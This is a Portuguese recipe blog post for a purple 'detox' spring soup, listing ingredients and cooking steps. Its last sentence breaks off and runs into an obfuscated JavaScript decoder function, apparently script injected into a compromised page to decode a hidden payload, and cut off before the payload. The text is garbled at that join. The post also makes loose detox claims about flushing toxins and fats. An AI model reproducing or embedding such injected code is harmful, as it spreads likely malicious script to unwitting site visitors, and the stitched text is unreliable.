Sopa roxa detox para a Primavera
Hoje trago-lhe uma receita de uma sopa roxa detox para a Primavera. É uma opção saudável e deliciosa para os seus jantares, principalmente se estiver a preparar o corpo para o verão e a tentar reduzir os números na balança! Esta sopa é rica em antioxidantes que ajudam a retardar o envelhecimento e a combater os radicais livres + fibra, que ajuda a eliminar as toxinas e as gorduras do nosso organismo, + proteína, que é fundamental para o desenvolvimento e reestruturação dos nossos músculos. E estes são os elementos essenciais que devem estar presentes numa alimentação equilibrada.
Conheça agora esta receita deliciosa e partilhe com os seus amigos e familiares.
Sopa roxa detox para 6 pessoas
Ingredientes
2 curgetes médias
2 beterrabas
1 cebola roxa grande
5 dentes de alho
5 colheres de sopa de azeite
1 couve roxa média
Sal q.b
Pimenta q.b
Cogumelos frescos laminados
2 ovos cozidos
Modo de preparação
Comece por lavar bem os legumes. De seguida, descasque a cebola, os alhos, as curgetes e as beterrabas. Coloque o azeite na panela da sopa e faça um refogado com todos os legumes incluindo a couve partida às tirinhas. Num tacho à parte coza os ovos. Quando estiverem cozidos descasque-os e parta-os às rodelas ou aos pedacinhos... enfim, como mais gostar.
Depois de os legumes estarem refogados, adicione-lhes água até cobrir os legumes. Se gostar da sopa mais cremosa e espessa, adicione menos quantidade de água. Mas, se por outro lado, prefere a sopa mais líquida acrescente um pouco mais de água acima dos legumes. Tempere a gosto com sal, pimenta e ervas aromáticas e deixe cozinhar durante 30 minutos.
Quando os legumes estiverem cozidos, triture a sopa com a varinha mágica. Passe os cogumelos numa frigideira com azeite e um bocadinho de cebola. Para terminar, espalhe os ovos e os cogumelos uniformemente na sua sopa, adicione algumas folhas de ervas aromáticas e a sua sopa está pronta a ser servida e partilhada com aqueles que mais gosta!
Se gostou da receita desta sopa roxa detox para a Primavera descubra a receita de mais sopas: sopa de coentros e sopa de trigo da Madeira. E, se gosta de decoração, veja function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa